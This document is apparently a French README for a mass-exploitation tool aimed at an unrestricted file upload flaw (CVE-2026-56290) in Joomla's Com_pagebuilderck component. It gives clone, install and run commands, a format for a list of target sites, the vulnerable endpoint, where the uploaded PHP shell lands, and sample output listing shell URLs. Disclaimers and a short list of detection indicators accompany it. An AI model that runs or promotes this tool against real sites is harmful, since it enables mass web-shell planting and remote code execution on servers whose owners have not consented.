
CVE-2026-56290 - Exploit de masse pour le composant Com_pagebuilderck de Joomla (téléversement de fichiers non restreint → RCE). Multithreadé, contournement automatique du CSRF, téléverseur de shell PHP.
Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.
- L'accès non autorisé à des systèmes informatiques est illégal
- Utilisez cet outil uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test
- L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil
- En utilisant cet outil, vous acceptez de vous conformer à toutes les lois et réglementations applicables
Pour plus d'avertissements, vous pouvez consulter l'avertissement sur la couverture de Jenderal92. Vous pouvez le vérifier ICI !!!
CVE-2026-56290 est un outil d'exploitation de masse ciblant le composant Com_pagebuilderck de Joomla. Cette vulnérabilité permet à des attaquants distants de téléverser des fichiers PHP arbitraires via un mécanisme de téléversement de fichiers sans restriction, conduisant à une exécution de code à distance (RCE).
| Attribut | Valeur |
|---|---|
| Identifiant CVE | CVE-2026-56290 |
| Composant | Com_pagebuilderck |
| Plateforme | Joomla! CMS |
| Type | Téléversement de fichiers sans restriction (RCE) |
| Score CVSS | 9.8 (Critique) |
/media/com_pagebuilderck/gfonts/reslt.txtPython 2.7
pip (Python package installer)
Dépendances Python
pip install requests colorama
🔧 Installation
git clone https://github.com/Jenderal92/CVE-2026-56290.git
cd CVE-2026-56290
pip install -r requirements.txt
📖 Utilisation
Utilisation de base
python CVE-2026-56290.py targets.txt
Format du fichier d'entrée
Créez un fichier targets.txt avec une URL par ligne :
https://example1.com
http://example2.com/joomla
https://example3.com:8080
# Comments are ignored
Sortie
· Console : progression et résultats en temps réel · reslt.txt : contient toutes les URL de shell vulnérables
Exemple d'exécution
$ python CVE-2026-56290.py targets.txt
[+] CVE-2026-56290 - Com_pagebuilderck Mass Exploit
[+] Threads: 15
[+] Timeout: 10s
[+] Output file: reslt.txt
[+] Loaded 100 targets from file
[*] Starting pool with 15 processes...
[1] Queueing: https://example1.com
[2] Queueing: https://example2.com
...
[1] ✓✓✓ VULNERABLE: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php
⚙️ Configuration
Vous pouvez modifier ces variables dans le script :
THREADS = 15 # Number of concurrent workers
TIMEOUT = 10 # Request timeout in seconds
USER_AGENT = "..." # Custom User-Agent string
OUTPUT_FILE = "reslt.txt" # Output filename
🛡️ Considérations de sécurité
Pour les administrateurs système
Si vous gérez un site Joomla avec Com_pagebuilderck :
Indicateurs de compromission (IoC)
Recherchez ces signes d'exploitation :
# Suspicious files in
/media/com_pagebuilderck/gfonts/*.php
/media/com_pagebuilderck/gfonts/*.phtml
/media/com_pagebuilderck/gfonts/*.phar
# Suspicious requests
/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1
Commandes de détection
# Find suspicious PHP files in the media directory
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f
# Check for recent modifications
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7
# Look for suspicious file names (random strings)
ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)'
⚠️ Avis juridique
Ce logiciel est fourni « en l'état », sans garantie d'aucune sorte. L'auteur n'est pas responsable de toute utilisation illégale ou contraire à l'éthique de cet outil. Obtenez toujours une autorisation appropriée avant de tester tout système.
🙏 Remerciements
· Les chercheurs en sécurité qui ont découvert et signalé CVE-2026-56290 · La communauté Joomla pour la maintenance du CMS
Rappelez-vous : un grand pouvoir implique de grandes responsabilités. Utilisez cet outil de manière éthique et légale.